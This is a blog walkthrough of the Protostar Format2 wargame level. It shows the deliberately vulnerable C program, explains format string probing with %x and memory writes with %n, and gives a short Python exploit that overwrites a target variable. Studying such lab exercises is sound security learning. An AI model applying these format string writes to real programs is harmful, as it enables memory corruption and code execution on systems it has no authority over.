Binary Exploitation Protostar Format2 - Walkthrough - writeup

Hello Guyz,



Welcome again to my blog. Today, I am going to share with you my walkthrough experience of Exploit-Exercise Protostar Format2 Level.


In this level, Our goal is to overwrite Return pointer Address And So, That In Future We can use This Vulnerability To Execute Our Injected Shellcodes. Actually, We just need to prove that with this vulnerability we can overwrite the EIP register but here comes another difficulty of this level. As Already mentioned in the hint

We have to use Format String Vulnerability To Overwrite our Instruction Pointer Register.

After Searching, About this vulnerability, I found below-mentioned articles very useful. So, Use below mention links as the reference of format string vulnerability.

1. OWASP
2. StackOverflow
3.  PDF


Before Starting Our Walkthrough Let's Take a Look At Hints And Details.

Note: I want to highlight Few Points.

  • I'm not the creator of protostar war game. I am just a player.
  • Here, I am Just providing you hints and reference so, that if you feel stuck anywhere. Take a Look Here.
  • Understand all previous levels before starting this one.
  • Do some research on Assembly, C/C++ and Gdb

Source Code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln()
{
  char buffer[512];

  fgets(buffer, sizeof(buffer), stdin);
  printf(buffer);
  
  if(target == 64) {
      printf("you have modified the target :)\n");
  } else {
      printf("target is %d :(\n", target);
  }
}

int main(int argc, char **argv)
{
  vuln();
}


Hint

This level moves on from format1 and shows how specific values can be written in memory.

This level is at /opt/protostar/bin/format2

Implementation

After Some Google and Reading Some Paper. I found that
     printf family functions are really very prone to format string vulnerability. it can be very dangerous for a program if a programmer doesn't use these function carefully.


Step 1:
    --------------------------------------------
    |  AAAAAA %x%x%x%x%x%x%x%x%x%x%x%x          |
    --------------------------------------------
 %x will print arguments from the top of stack
 check exact padding between the starting of our string Onto the top of stack through printf vulnerability %x

Step 2:
 %5$x : Here, $ sign helps in selecting exact index of string. so, we can use this advantage.
 %5$n : n, expression can write number of bytes onto pointing address.
 
    --------------------------------------------
    |  Address1, Address2 %number_of_bytesx%1$n %number_of_bytesx%2$n          |
    --------------------------------------------
 
 

Exploit

#!/usr/bin/python

# 080496e4
t = "\xe4\x96\x04\x08"
a = "a"

#print t+"%x.............%x...........%x................."+'%n',


print t+"%20x%20x%20x"+'%n',

For More Detailed Walk through Check Below Provided YouTube Video Playlist



Share this

Related Posts

Previous
Next Post »